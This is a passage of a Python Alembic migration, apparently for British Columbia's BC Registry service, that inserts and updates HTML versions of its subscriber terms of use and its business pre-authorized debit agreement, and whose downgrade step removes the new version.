<li><span>(d)</span>in no event will the Province, its respective servants, agents, contractors or employees be liable for any loss or damage in connection with the Service or any Content, including without limitation any loss or damage caused by any alteration of the format or content of a print copy or electronic display of any information retrieved from the Service, the quality of any print display, the information contained in any screen dump, any system failure, hardware malfunction, manipulation of data, inadequate or faulty Transaction and/or Service, or delay or failure to provide Access to any Team Member or any person using a Team Member's Incorporation Numbers or Passcodes or using any information provided by a Subscriber or any Team Member from the Service.</li>
</ul>
<li><span>12.3</span>The Subscriber must indemnify and save harmless the Province and its respective servants, agents, contractor and employees from any losses, claims, damages, actions, causes of action, costs and expenses that the Province or any of its respective servants, agents, contractors or employees may sustain, incur, suffer or be put to at any time, either before or after this Agreement ends, including any claim of infringement of third-party intellectual property rights, where the same or any of them are based upon, arise out of or occur, directly or indirectly, by reason of any act or omission by the Subscriber, a Team Member or by any of the Subscriber’s other agents, employees, officers or directors in connection with this Agreement.</li>
</ul>
</section>
<section>
<header>13. Notices</header>
<ul>
<li><span>13.1</span>Any written notice either party may be required or may desire to give to the other under this Agreement will be conclusively deemed validly given to or received by the addressee, if delivered personally or by recognized courier service, on the date of such personal delivery, if mailed by prepaid registered mail, on the third business day after the mailing of the same in British Columbia or on the seventh business day if mailed elsewhere, and if delivered by email, on the date received by the recipient:
<li>
<ul>
<li><span>(a)</span>If to the Subscriber, to the address or email address indicated on the Subscriber’s application for the Service, or such other address or email address of which the Subscriber has notified the Province in writing; and</li>
</ul>
</li>
<li>
<ul>
<p><span>(b)</span>If to the Province:<br></p>
<p>
Delivery by mail:
</p>
<p>
BC Online Partnership Office<br>
Ministry of Citizens’ Services<br>
PO Box 9412 Stn Prov Govt<br>
Victoria, BC V8W 9V1
</p>
<p>Delivery by courier or in person:</p>
<p>
BC Online Partnership Office<br>
Ministry of Citizens’ Services<br>
E161 – 4000 Seymour Place<br>
Victoria, BC V8X 4S8
</p>
<p>Delivery by email:</p>
bconline@gov.bc.ca
</ul>
</li>
<li><span>13.2</span>The Subscriber will provide the Province with timely written notice of any change of contact information provided by the Subscriber during the application process for Access, and after the provision of such notice, the updated contact information will be conclusively deemed to be the current contact information for the Subscriber, including the Subscriber’s address or email addrss for the purposes of this Article 13.</li>
<li><span>13.1</span>The Province may, from time to time, advise the Subscriber by notice in writing of any change of address of the Province and from and after the giving of such notice the address specified in the notice will, for the purposes of this Article 13, be conclusively deemed to be the address or email address of the Province.</li>
<li><span>13.3</span>In the event of a disruption of postal services, all mailed notices will be deemed validly given and received when actually received by the addressee.</li>
</ul>
</section>
<section>
<header>14. General</header>
<ul>
<li><span>14.1</span>In this Agreement,</li>
<li>
<ul>
<li><span>(a)</span>unless the context otherwise requires, references to section or Articles by number are to sections or Articles of the body of the Agreement;</li>
<li><span>(b)</span>unless otherwise specified, a reference to a statute by name means the statute of British Columbia by that name, as amended or replaced from time to time;</li>
<li><span>(c)</span>"person" includes an individual, partnership, corporation or legal entity of any nature; and</li>
<li><span>(d)</span>unless the context otherwise requires, words expressed in the singular includes the plural and vice versa.</li>
</ul>
</li>
<li><span>14.2</span>The Schedules to this Agreement are a part of this Agreement.</li>
<li><span>14.3</span>In the event of any conflict or inconsistency between a term in the body of this Agreement and a term in a Schedule, the term in the Schedule will prevail.</li>
<li><span>14.4</span>The Subscriber will not, without the prior written consent of the Province, assign, either directly or indirectly, this Agreement or any right of the Subscriber under this Agreement.</li>
<li><span>14.5</span>This Agreement will be for the benefit of and be binding upon the successors and permitted assigns of each of the parties.</li>
<li><span>14.6</span>This Agreement (including any terms incorporated by reference herein) is the entire agreement between the Subscriber and the Province with respect to the subject matter of this Agreement, and supercedes and replaces any prior and/or written agreements.</li>
<li><span>14.7</span>The headings in this Agreement are inserted for convenience only, and will not be used in interpreting or construing any provision of this Agreement.</li>
<li><span>14.8</span>All provisions in this Agreement in favour or either party and all rights and remedies of either party, either at law or in equity, will survive the expiration or sooner termination of this Agreement.</li>
<li><span>14.9</span>If any provision of this Agreement is invalid, illegal or unenforceable, that provision will be severed from this Agreement and all other provisions will remain in full force and effect.</li>
<li><span>14.10</span>This Agreement will be governed by and construed in accordance with the laws of British Columbia and the laws of Canada applicable therein. By using the Service, the Subscriber consents to the exclusive jurisdiction and venue of the courts of the province of British Columbia for the hearing of any dispute arising from or related to this Agreement and/or the Subscriber’s use of the Service.</li>
</ul>
</section>
"""
op.bulk_insert(
documents,
[
{'version_id': '4', 'type': 'termsofuse', 'content': html_content, 'content_type': 'text/html'}
]
)
# update terms of use version 3 content
tos_version3_content = """
<section>
<p>The parties to this “BC Registry Terms and Conditions of Agreement” (the “Agreement”) are Her Majesty the Queen in Right of the Province of British Columbia, as represented by the Minister of Citizens’ Services (the “Province”) and the Subscriber (as defined below).</p>
</section>
<section>
<header>1. DEFINITIONS</header>
<ul>
<li><span>a.</span><strong>"Access"</strong> means the non-exclusive right to electronically access and use the Service;</li>
<li><span>b.</span><strong>"Basic Account Subscriber"</strong> means a Subscriber with Access for up to ten Transactions per month that pays Fees for Transactions using a credit card;</li>
<li><span>c.</span><strong>"BCeID Information"</strong> means a BCeID account user ID or password, which authenticates the identity of the Subscriber or a User, as the case may be, to the Service if the Subscriber or a User uses a BCeID for this purpose;</li>
<li><span>d.</span><strong>"BC Online Terms and Conditions"</strong> means the BC Online Terms and Conditions of Agreement found at <a href="https://www.bconline.gov.bc.ca/terms_conditions.html">https://www.bconline.gov.bc.ca/terms_conditions.html;</a></li>
<li><span>e.</span><strong>"Content"</strong> means the Service’s Data Base, and all associated information and documentation, including any print copy or electronic display of any information retrieved from the Data Base and associated with the Service;</li>
<li><span>f.</span><strong>"Data Base"</strong> means any data base or information stored in electronic format for which Access is made available through the Service;</li>
<li><span>g.</span><strong>"Deposit Account"</strong> has the meaning given to it in the BC Online Terms and Conditions;</li>
<li><span>h.</span><strong>"Entity"</strong> means any legal entity (including a registered society, business, or co-operative) for which a User has Access through the Service;</li>
<li><span>i.</span><strong>"Fees"</strong> means all fees and charges for the Service, as described in the Business Corporations Act - Schedule (Section 431) Fees, Cooperative Association Act - Cooperative Association Regulation, Schedule A;</li>
<li><span>j.</span><strong>"Incorporation Number"</strong> means the unique numerical identifier for a Subscriber’s Entity, and when entered in conjunction with the Passcode, permits a User to perform transactions with regard to that Entity;</li>
<li><span>k.</span><strong>"Passcode"</strong> means the unique identifier issued by the Province to a Subscriber with regard to existing Entities on the Service, which enables a User to have Access with regard to those Entities;</li>
<li><span>l.</span><strong>"Premium Account Subscriber"</strong> means a Subscriber with Access to unlimited Transactions that has a Deposit Account with the Province and is charged Fees in accordance with the BC Online Terms and Conditions;</li>
<li><span>m.</span><strong>"Service"</strong> means the service operated by the Province that allows a Subscriber to complete Transactions relating to BC Entities or other information accessible through the Website;</li>
<li><span>n.</span><strong>"Services Card Number"</strong> means the Subscriber’s BC Services Card number, which authenticates the identity of the Subscriber, or a User, as the case may be, to the Service if the Subscriber or a User uses a BC Services Card for this purpose;</li>
<li><span>o.</span><strong>"Subscriber"</strong> means a person that accesses the Service and that has accepted the terms of this Agreement, and includes Premium Account Subscribers and Basic Account Subscribers;</li>
<li><span>p.</span><strong>"Transaction"</strong> means any action performed by the Subscriber or any of its Users to the Service to display, print, transfer, or obtain a copy of information contained on the Service, or where permitted by the Province, to add to or delete information from the Service;</li>
<li><span>q.</span><strong>"User"</strong> means an individual that is granted Access on the individual’s behalf, if the individual is also the Subscriber, or on behalf of the Subscriber, if the individual is an employee or is otherwise authorized to act on behalf of the Subscriber, as applicable;</li>
<li><span>r.</span><strong>"Website"</strong> means the BC Cooperatives Website at bcregistry.ca/cooperatives and includes all web pages and associated materials, with the exception of the Content.</li>
</ul>
</section>
<section>
<header>2. ACCEPTANCE OF AGREEMENT</header>
<ul>
<li><span>2.1</span>The Subscriber acknowledges that a duly authorized representative of the Subscriber has accepted the terms of this Agreement on behalf of the Subscriber and its Users.</li>
<li><span>2.2</span>The Subscriber acknowledges and agrees that:</li>
<li>
<ul>
<li><span>(a)</span>by creating a profile and/or by clicking the button acknowledging acceptance of this Agreement, each User using the Services on behalf of the Subscriber also accepts, and will be conclusively deemed to have accepted, the terms of this Agreement as they pertain to the User’s use of the Services; and</li>
<li><span>(b)</span>the Subscriber will be solely responsible for its Users’ use of the Services, including without limitation any Fees incurred by its Users in connection with such Services.</li>
</ul>
</li>
<li><span>2.3</span>The Subscriber acknowledges that the terms of the BC Services Card Login Service found at (<a href="https://www2.gov.bc.ca/gov/content/governments/government-id/bc-services-card/terms-of-use" target="_blank">https://www2.gov.bc.ca/gov/content/governments/government-id/bc-services-card/terms-of-use</a>) continue to apply in respect of use of the Services Card by either the Subscriber or a User.</li>
<li><span>2.4</span>Premium Account Subscribers acknowledge that in addition to this Agreement, the terms of the BC Online Terms and Conditions will continue to apply in respect of the use of the Subscriber’s Deposit Account for payment of Fees for the Service.</li>
<li><span>2.5</span>The Subscriber acknowledges that the BCeID terms found at (<a href="https://www.bceid.ca/aboutbceid/agreements.aspx" target="_blank">https://www.bceid.ca/aboutbceid/agreements.aspx</a>) and applicable to the type of BCeID held by the Subscriber or a User, as the case may be, continue to apply in respect of use of the Subscriber or User’s BCeID.</li>
<li><span>2.6</span>The Subscriber will ensure that each of its Users are aware of and comply with the terms of this Agreement as they pertain to the User’s use of the Services.</li>
<li><span>2.7</span>The Province reserves the right to make changes to the terms of this Agreement at any time without direct notice to either the Subscriber or its Users, as applicable. The Subscriber acknowledges and agrees that it is the sole responsibility of the Subscriber to review, and, as applicable, to ensure that its Users review, the terms of this Agreement on a regular basis.</li>
<li><span>2.8</span>Following the date of any such changes, the Subscriber will be conclusively deemed to have accepted any such changes on its own behalf and on behalf of its Users, as applicable. The Subscriber acknowledges and agrees that each of its Users must also accept any such changes as they pertain to the User’s use of the Services.</li>
</ul>
</section>
<section>
<header>3. PROPRIETARY RIGHTS</header>
<ul>
<li><span>3.1</span>The Website and the Content is owned by the Province and/or its licensors and is protected by copyright, trademark and other laws. Except as expressly permitted in this Agreement, the Subscriber may not use, reproduce, modify or distribute, or allow any other person to use, reproduce, modify or distribute, any part of the Website in any form whatsoever without the prior written consent of the Province.</li>
</ul>
</section>
<section>
<header>4. SERVICES</header>
<ul>
<li><span>4.1</span>The Province will provide the Subscriber and its Users with Access on the terms and conditions set out in this Agreement.</li>
<li><span>4.2</span>Subject to section 4.3, Access will be available during the hours published on the Website, as may be determined by the Province in its sole discretion from time to time.</li>
<li><span>4.3</span>The Province reserves the right to limit or withdraw Access at any time in order to perform maintenance of the Service or in the event that the integrity or security of the Service is compromised.</li>
<li><span>4.4</span>The Province further reserves the right to discontinue the Service at any time.</li>
<li><span>4.5</span>The Province will provide helpdesk support to assist Users with Access during the hours published on the Website, as may be determined by the Province in its sole discretion from time to time.</li>
<li><span>4.6</span>The Subscriber acknowledges and agrees that, for the purpose of Access:</li>
<li>
<ul>
<li><span>(a)</span>it is the Subscriber’s sole responsibility, at the Subscriber’s own expense, to provide, operate and maintain computer hardware and communications software or web browser software that is compatible with the Services; and</li>
<li><span>(b)</span>that any failure to do so may impact the Subscriber’s and/or User’s ability to access the Service.</li>
</ul>
</li>
</ul>
</section>
<section>
<header>5. SUBSCRIBER OBLIGATIONS</header>
<ul>
<li><span>5.1</span> The Subscriber will comply, and will ensure that all of its Users comply, with:</li>
<li>
<ul>
<li><span>(a)</span>the requirements regarding the integrity and/or security of the Service set out in this Article 4; and</li>
<li><span>(b)</span>all applicable laws,</li>
</ul>
</li>
<li>in connection with the Subscriber’s and/or Users’ use of the Services. </li>
<li><span>5.2</span> The Subscriber will ensure that each User:</li>
<li>
<ul>
<li><span>(a)</span>is duly authorized by the Subscriber to perform any Transaction and utilize the Service on behalf of the Subscriber;</li>
<li><span>(b)</span>maintains in confidence Services Card Numbers, BCeID Information, Incorporation Numbers and Passcodes;</li>
<li><span>(c)</span>is competent to perform a Transaction and utilize the Service; </li>
<li><span>(d)</span>has been adequately trained and instructed to perform a Transaction and utilize the Service; and</li>
<li><span>(e)</span>does not use the Service for any inappropriate or unlawful purpose.</li>
</ul>
</li>
</ul>
</section>
<section>
<header>6. FEES</header>
<ul>
<li><span>6.1</span>The Subscriber will pay to the Province all applicable Fees for the Services.</li>
<li><span>6.2</span>Fees payable for Transactions processed by Premium Account Subscribers will be charged to the applicable Deposit Account and in accordance with the BC Online Terms and Conditions.</li>
<li><span>6.3</span>Fees payable for Transactions processed by Basic Account Subscribers will be payable by credit card before the Transaction is processed.</li>
</ul>
</section>
<section>
<header>7. RELATIONSHIP</header>
<ul>
<li><span>7.1</span>This Agreement will not in any way make the Subscriber or any User an employee, agent or independent contractor of the Province and the Subscriber will not, and will ensure that its Users do not, in any way indicate or hold out to any person that the Subscriber or any User is an employee, agent or independent contractor of the Province.</li>
</ul>
</section>
<section>
<header>8. SUSPENSION OF SERVICE</header>
<ul>
<li><span>8.1 </span> The Province may, in its sole discretion, immediately suspend Access upon written notice to the Subscriber if:</li>
<li>
<ul>
<li><span>(a)</span>the Subscriber or any of its Users has, in the reasonable opinion of the Province, in any way jeopardized the integrity or security of the Service; or</li>
<li><span>(b)</span>the Subscriber or any of its Users has violated any other provision of this Agreement.</li>
</ul>
</li>
</ul>
</section>
<section>
<header>9. TERMINATION</header>
<ul>
<li><span>9.1</span>The Province may immediately terminate this Agreement upon written notice to the Subscriber if the Subscriber’s Access has been suspended pursuant to section 8.1.</li>
<li><span>9.2</span>Upon termination:</li>
<li>
<ul>
<li><span>(a)</span>the Subscriber will immediately cease, and will ensure that all of its Users immediately cease, all use of the Service and all Passcodes; and</li>
<li><span>(b)</span>Premium Account Subscribers will pay to the Province all unpaid Fees incurred by the Subscriber up to the date of termination.</li>
</ul>
</li>
<li><span>9.3</span>In the event that a Subscriber’s Agreement is terminated, the Province reserves the right to refuse future Access to that Subscriber or to downgrade a Premium Account Subscriber to a Basic Account Subscriber, in which case the Subscriber acknowledges and agrees that it is only entitled to Access up to ten Entities and will release any Entities in excess of that number.</li>
</ul>
</section>
<section>
<header>10. WARRANTY DISCLAIMER, LIMITATION OF LIABILITY AND INDEMNITY</header>
<ul>
<li><span>10.1</span>The subscriber acknowledges and confirms that the subscriber understands that this article 10 requires the subscriber to assume the full risk in respect of any use of the services by the subscriber and/or its users.</li>
<li><span>10.2</span>Except as expressly set out in this Agreement, and in addition to the Province’s general Warranty Disclaimer and Limitation of Liabilities, the Province assumes no responsibility or liability to any person using the Service or any Content. In particular, without limiting the general nature of the foregoing:</li>
<li>
<ul>
<li><span>(a)</span>in no event will the Province, its respective servants, agents, contractors or employees be liable for any direct, indirect, special or consequential damages or other loss, claim or injury, whether foreseeable or unforeseeable (including without limitation claims for damages for personal injury, lost profits, lost savings or business opportunities) arising out of or in any way connected with the use of, or inability to use the Service or any Content;</li>
<li><span>(b)</span>the entire risk as to the quality and performance of the Service or any Content, is assumed by the Subscriber;</li>
<li><span>(c)</span>the Service and all Content are provided “as is”, and the Province disclaims all representations, warranties, conditions, obligations and liabilities of any kind, whether express or implied, in relation to the Service or any Content, including without limitation implied warranties with respect to merchantability, fitness for a particular purpose, error-free or uninterrupted use and non-infringement; and</li>
<li><span>(d)</span>in no event will the Province, its respective servants, agents, contractors or employees be liable for any loss or damage in connection with the Service or any Content, including without limitation any loss or damage caused by any alteration of the format or content of a print copy or electronic display of any information retrieved from the Service, the quality of any print display, the information contained in any screen dump, any system failure, hardware malfunction, manipulation of data, inadequate or faulty Transaction and/or Service, or delay or failure to provide Access to any User or any person using a User's Incorporation Numbers or Passcodes or using any information provided by a Subscriber or any User from the Service.</li>
</ul>
</li>
<li><span>10.3</span>The Subscriber must indemnify and save harmless the Province and its respective servants, agents, contractor and employees from any losses, claims, damages, actions, causes of action, costs and expenses that the Province or any of its respective servants, agents, contractors or employees may sustain, incur, suffer or be put to at any time, either before or after this Agreement ends, including any claim of infringement of third-party intellectual property rights, where the same or any of them are based upon, arise out of or occur, directly or indirectly, by reason of any act or omission by the Subscriber or by any of the Subscriber’s agents, employees, officers or directors in connection with this Agreement.</li>
</ul>
</section>
<section>
<header>11. GENERAL</header>
<ul>
<li><span>11.1</span>In this Agreement,</li>
<li>
<ul>
<li><span>(a)</span>unless the context otherwise requires, references to sections by number are to sections of the Agreement;</li>
<li><span>(b)</span>unless otherwise specified, a reference to a statute by name means the statute of British Columbia by that name, as amended or replaced from time to time;</li>
<li><span>(c)</span>“person” includes an individual, partnership, corporation or legal entity of any nature; and</li>
<li><span>(d)</span>unless the context otherwise requires, words expressed in the singular includes the plural and vice versa.</li>
</ul>
</li>
<li><span>11.2</span>This Agreement is the entire agreement between the Subscriber and the Province with respect to the subject matter of this Agreement, and supercedes and replaces any prior and/or written agreements.</li>
<li><span>11.3</span>The headings in this Agreement are inserted for convenience only, and will not be used in interpreting or construing any provision of this Agreement</li>
<li><span>11.4</span>All provisions in this Agreement in favour or either party and all rights and remedies of either party, either at law or in equity, will survive the expiration or sooner termination of this Agreement.</li>
<li><span>11.5</span>If any provision of this Agreement is invalid, illegal or unenforceable, that provision will be severed from this Agreement and all other provisions will remain in full force and effect.</li>
<li><span>11.6</span>This Agreement will be governed by and construed in accordance with the laws of British Columbia and the laws of Canada applicable therein. By using the Service, the Subscriber consents to the exclusive jurisdiction and venue of the courts of the province of British Columbia for the hearing of any dispute arising from or related to this Agreement and/or the Subscriber’s use of the Service.</li>
</ul>
</section>
"""
op.execute(
documents.update()
.where(documents.c.version_id==op.inline_literal('3') and documents.c.type=='termsofuse' )
.values({'content':op.inline_literal(tos_version3_content)})
)
# update pad terms version p1 content
pad_terms_content = """
<section>
<header>
In this agreement:
</header>
<ul>
<li>
“the biller” refers to “Her Majesty the Queen in Right of the Province of British Columbia as represented by the Minister of Citizen’s Services - BC Registry and Online Services (Prov of BC);
</li>
<li>
“the payor” refers to the Premium Account Subscriber of the BC Registry Service as defined in the BC Registry Terms and Conditions of Agreement (the “BC Registry Terms”); and
</li>
<li>
unless defined herein, capitalized terms in this agreement will have the meaning as set out in BC Registry Terms.
</li>
</ul>
</section>
<section>
<header>
The payor acknowledges or understands:
</header>
<ul>
<li>
<span>1.</span>That this authorization is provided for the benefit of the biller and our financial institution, and is provided in consideration of the Payor’s Financial Institution agreeing to process debits (PADs) against the bank account as indicated in the biller’s PAD application webform and in accordance with the rules of <a href="http://www.payments.ca" target="_blank">Payments Canada</a>.
</li>
<li>
<span>2.</span>Ticking the acceptance box on the biller’s PAD application webform will be considered equivalent to my signature and will constitute valid authorization for the processing financial institution to debit the payor’s account as identified in the biller’s PAD application webform (the “Payor’s Bank Account”).
</li>
<li>
<span>3.</span>This authority will remain in effect until the biller has received written communication from the payor of cancellation or changes relating to the Payor’s Bank Account.
</li>
<li>
<span>4.</span>The payor may cancel this PAD agreement at any time with written notification to the biller. Written notification of changes or cancellation must be received at least 10 business days prior to the next online order or withdrawal. Notification must be in writing and sent either through the biller’s BC Registry website or by mail to the address provided below. A sample cancellation form or more information on my right to cancel a PAD Agreement can be obtained at my financial institution or by visiting <a href="http://www.payments.ca" target="_blank">www.payments.ca</a>.
</li>
<li>
<span>5.</span>That cancellation of this agreement by the payor or the biller:
</li>
<li>
<ul>
<li>
<span>a.</span>will result in the suspension of the payors’ Premium Account Subscriber account Access until the payor takes action to authorize another payment method; and
</li>
<li>
<span>b.</span>does not cancel any amount owed for the Service received prior to cancellation.
</li>
</ul>
</li>
<li>
<span>6.</span>Correspondence regarding this agreement will be sent to the payor at the email address associated with the payor’s Premium Subscriber Account (the “Payor’s Email Address”). The payor agrees that any communication sent by the biller to that email address will be deemed to have been received by the payor and acknowledges that it is the payor’s responsibility to notify the biller as soon as possible of changes to the Payor’s Email Address.
</li>
<li>
<span>7.</span><strong>The biller notification of enrollment or cancellation of this Pre-Authorized Debit Agreement to the Payor is being reduced from 15 calendar days to 3 calendar days in accordance with the H1 rule of Payments Canada. Notification will be delivered electronically to the Payor’s Email Address.</strong>
</li>
<li>
<span>8.</span>The payor has certain recourse rights if any debit does not comply with the terms of this business PAD agreement (for example, the right to receive reimbursement for any PAD that is not authorized or is not consistent with terms and conditions of this PAD Agreement). To obtain a form for reimbursement or for more information on recourse rights, contact your financial institution or visit <a href="http://www.payments.ca" target="_blank">www.payments.ca</a>.
</li>
<li>
<span>9.</span>Any payment dishonoured by the payor’s financial institution may result in a dishonoured banking instrument service fee, as prescribed by the Minister of Finance, being applied to the payor’s Premium Account Subscriber account. The biller is not responsible for any additional service fees charged by your financial institution.
</li>
<li>
<span>10.</span>In the event of a dishonoured payment, the biller reserves the right to suspend the payor’s Access until the payor has taken action to re-activate Access by paying any outstanding Fees and dishonoured banking instrument service fees by credit card.
</li>
<li>
<span>11.</span>Due to a delay in payment processing, the biller may subsequently suspend the payor’s Access after a payor has taken action to re-activate Access if another PAD is dishonoured in the intervening period.
</li>
<li>
<span>12.</span>The amount of the daily (excludes weekends and holidays) withdrawal is variable and dependent on the total daily Transactions charged to the payors’ Premium Account Subscriber’s account by Team Members who are authorized to order BC Registry Services.
</li>
<li>
<span>13.</span><strong>The standard 10 calendar day pre-notification period for the sporadic and variable pre-authorized withdrawals will be reduced to 1-2 business days.</strong>
</li>
<li>
<span>14.</span>The biller will provide PAD pre-notification 1-2 business days prior to the withdrawal date. This notification will confirm the amount and estimated date of the pre-authorized withdrawal, will provide a list of all services ordered & other account adjustments and will be delivered electronically to the Payor’s Email Address.
</li>
<li>
<span>15.</span>Your financial institution is not responsible for verifying whether payment has been issued in accordance with the particulars of this agreement.
</li>
</ul>
</section>
<section>
<header>
<strong>Payor Authorization:</strong>
</header>
<p>
I have read, understood and agree to the terms and conditions of the Business Pre-Authorized Debit Terms and Conditions for BC Registry Services
</p>
<p>
I confirm, I am an authorized representative for the payor and authorized signatory on the account to be debited under this agreement.
</p>
<p>
I authorize the biller to withdraw funds from the bank account as indicated above as per the terms and conditions of this agreement.
</p>
<p>
Dated: Month Day, Year
</p>
</section>
"""
op.execute(
documents.update()
.where(documents.c.version_id==op.inline_literal('p1') and documents.c.type=='termsofuse_pad' )
.values({'content':op.inline_literal(pad_terms_content)})
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.execute("DELETE FROM DOCUMENTS WHERE version_id='4' AND type='termsofuse'")
tos_version3_content = """
<article>
<p>The parties to this “BC Registry Terms and Conditions of Agreement” (the “Agreement”) are Her Majesty the Queen in Right of the Province of British Columbia, as represented by the Minister of Citizens’ Services (the “Province”) and the Subscriber (as defined below).</p>
<section>
<header><span>1.</span> DEFINITIONS</header>
<div>
<p><span>a.</span> <strong>“Access”</strong> means the non-exclusive right to electronically access and use the Service;</p>
<p><span>b.</span> <strong>“Basic Account Subscriber”</strong> means a Subscriber with Access for up to ten Transactions per month that pays Fees for Transactions using a credit card;</p>
<p><span>c.</span> <strong>“BCeID Information”</strong> means a BCeID account user ID or password, which authenticates the identity of the Subscriber or a User, as the case may be, to the Service if the Subscriber or a User uses a BCeID for this purpose;</p>
<p><span>d.</span> <strong>“BC Online Terms and Conditions”</strong> means the BC Online Terms and Conditions of Agreement found at <a href="https://www.bconline.gov.bc.ca/terms_conditions.html">https://www.bconline.gov.bc.ca/terms_conditions.html;</a></p>
<p><span>e.</span> <strong>"Content"</strong> means the Service’s Data Base, and all associated information and documentation, including any print copy or electronic display of any information retrieved from the Data Base and associated with the Service;</p>
<p><span>f.</span> <strong>"Data Base"</strong> means any data base or information stored in electronic format for which Access is made available through the Service;</p>
<p><span>g.</span> <strong>"Deposit Account"</strong> has the meaning given to it in the BC Online Terms and Conditions;</p>
<p><span>h.</span> <strong>"Entity"</strong> means any legal entity (including a registered society, business, or co-operative) for which a User has Access through the Service;</p>
<p><span>i.</span> <strong>"Fees"</strong> means all fees and charges for the Service, as described in the Business Corporations Act - Schedule (Section 431) Fees, Cooperative Association Act - Cooperative Association Regulation, Schedule A;</p>
<p><span>j.</span> <strong>"Incorporation Number"</strong> means the unique numerical identifier for a Subscriber’s Entity, and when entered in conjunction with the Passcode, permits a User to perform transactions with regard to that Entity;</p>
<p><span>k.</span> <strong>"Passcode"</strong> means the unique identifier issued by the Province to a Subscriber with regard to existing Entities on the Service, which enables a User to have Access with regard to those Entities;</p>
<p><span>l.</span> <strong>"Premium Account Subscriber"</strong> means a Subscriber with Access to unlimited Transactions that has a Deposit Account with the Province and is charged Fees in accordance with the BC Online Terms and Conditions;</p>
<p><span>m.</span> <strong>"Service"</strong> means the service operated by the Province that allows a Subscriber to complete Transactions relating to BC Entities or other information accessible through the Website;</p>
<p><span>n.</span> <strong>"Services Card Number"</strong> means the Subscriber’s BC Services Card number, which authenticates the identity of the Subscriber, or a User, as the case may be, to the Service if the Subscriber or a User uses a BC Services Card for this purpose;</p>
<p><span>o.</span> <strong>"Subscriber"</strong> means a person that accesses the Service and that has accepted the terms of this Agreement, and includes Premium Account Subscribers and Basic Account Subscribers;</p>
<p><span>p.</span> <strong>"Transaction"</strong> means any action performed by the Subscriber or any of its Users to the Service to display, print, transfer, or obtain a copy of information contained on the Service, or where permitted by the Province, to add to or delete information from the Service;</p>
<p><span>q.</span> <strong>"User"</strong> means an individual that is granted Access on the individual’s behalf, if the individual is also the Subscriber, or on behalf of the Subscriber, if the individual is an employee or is otherwise authorized to act on behalf of the Subscriber, as applicable;</p>
<p><span>r.</span> <strong>"Website"</strong> means the BC Cooperatives Website at bcregistry.ca/cooperatives and includes all web pages and associated materials, with the exception of the Content.</p>
</div>
</section>
<section>
<header><span>2.</span> ACCEPTANCE OF AGREEMENT</header>
<div>
<p><span>2.1</span> The Subscriber acknowledges that a duly authorized representative of the Subscriber has accepted the terms of this Agreement on behalf of the Subscriber and its Users.</p>
<p><span>2.2</span> The Subscriber acknowledges and agrees that:</p>
<div>
<p><span>(a)</span> by creating a profile and/or by clicking the button acknowledging acceptance of this Agreement, each User using the Services on behalf of the Subscriber also accepts, and will be conclusively deemed to have accepted, the terms of this Agreement as they pertain to the User’s use of the Services; and</p>
<p><span>(b)</span> the Subscriber will be solely responsible for its Users’ use of the Services, including without limitation any Fees incurred by its Users in connection with such Services.</p>
</div>
<p><span>2.3</span> The Subscriber acknowledges that the terms of the BC Services Card Login Service found at (<a href="https://www2.gov.bc.ca/gov/content/governments/government-id/bc-services-card/log-in-with-card/terms-of-use" target="_blank">https://www2.gov.bc.ca/gov/content/governments/government-id/bc-services-card/terms-of-use</a>) continue to apply in respect of use of the Services Card by either the Subscriber or a User.</p>
<p><span>2.4</span> Premium Account Subscribers acknowledge that in addition to this Agreement, the terms of the BC Online Terms and Conditions will continue to apply in respect of the use of the Subscriber’s Deposit Account for payment of Fees for the Service.</p>
<p><span>2.5</span> The Subscriber acknowledges that the BCeID terms found at (<a href="https://www.bceid.ca/aboutbceid/agreements.aspx" target="_blank">https://www.bceid.ca/aboutbceid/agreements.aspx</a>) and applicable to the type of BCeID held by the Subscriber or a User, as the case may be, continue to apply in respect of use of the Subscriber or User’s BCeID.</p>
<p><span>2.6</span> The Subscriber will ensure that each of its Users are aware of and comply with the terms of this Agreement as they pertain to the User’s use of the Services.</p>
<p><span>2.7</span> The Province reserves the right to make changes to the terms of this Agreement at any time without direct notice to either the Subscriber or its Users, as applicable. The Subscriber acknowledges and agrees that it is the sole responsibility of the Subscriber to review, and, as applicable, to ensure that its Users review, the terms of this Agreement on a regular basis.</p>
<p><span>2.8</span> Following the date of any such changes, the Subscriber will be conclusively deemed to have accepted any such changes on its own behalf and on behalf of its Users, as applicable. The Subscriber acknowledges and agrees that each of its Users must also accept any such changes as they pertain to the User’s use of the Services.</p>
</div>
</section>
<section>
<header><span>3.</span> PROPRIETARY RIGHTS</header>
<div>
<p><span>3.1</span> The Website and the Content is owned by the Province and/or its licensors and is protected by copyright, trademark and other laws. Except as expressly permitted in this Agreement, the Subscriber may not use, reproduce, modify or distribute, or allow any other person to use, reproduce, modify or distribute, any part of the Website in any form whatsoever without the prior written consent of the Province. </p>
</div>
</section>
<section>
<header><span>4.</span> SERVICES</header>
<div>
<p><span>4.1</span> The Province will provide the Subscriber and its Users with Access on the terms and conditions set out in this Agreement.</p>
<p><span>4.2</span> Subject to section 4.3, Access will be available during the hours published on the Website, as may be determined by the Province in its sole discretion from time to time.</p>
<p><span>4.3</span> The Province reserves the right to limit or withdraw Access at any time in order to perform maintenance of the Service or in the event that the integrity or security of the Service is compromised.</p>
<p><span>4.4</span> The Province further reserves the right to discontinue the Service at any time.</p>
<p><span>4.5</span> The Province will provide helpdesk support to assist Users with Access during the hours published on the Website, as may be determined by the Province in its sole discretion from time to time.</p>
<p><span>4.6</span> The Subscriber acknowledges and agrees that, for the purpose of Access:</p>
<div>
<p><span>(a)</span> it is the Subscriber’s sole responsibility, at the Subscriber’s own expense, to provide, operate and maintain computer hardware and communications software or web browser software that is compatible with the Services; and</p>
<p><span>(b)</span> that any failure to do so may impact the Subscriber’s and/or User’s ability to access the Service.</p>
</div>
</div>
</section>
<section>
<header><span>5.</span> SUBSCRIBER OBLIGATIONS</header>
<div>
<p><span>5.1</span> The Subscriber will comply, and will ensure that all of its Users comply, with:</p>
<div>
<p><span>(a)</span> the requirements regarding the integrity and/or security of the Service set out in this Article 4; and</p>
<p><span>(b)</span> all applicable laws,</p>
</div>
<p>in connection with the Subscriber’s and/or Users’ use of the Services. </p>
<p><span>5.2</span> The Subscriber will ensure that each User:</p>
<div>
<p><span>(a)</span> is duly authorized by the Subscriber to perform any Transaction and utilize the Service on behalf of the Subscriber;</p>
<p><span>(b)</span> maintains in confidence Services Card Numbers, BCeID Information, Incorporation Numbers and Passcodes;</p>
<p><span>(c)</span> is competent to perform a Transaction and utilize the Service; </p>
<p><span>(d)</span> has been adequately trained and instructed to perform a Transaction and utilize the Service; and</p>
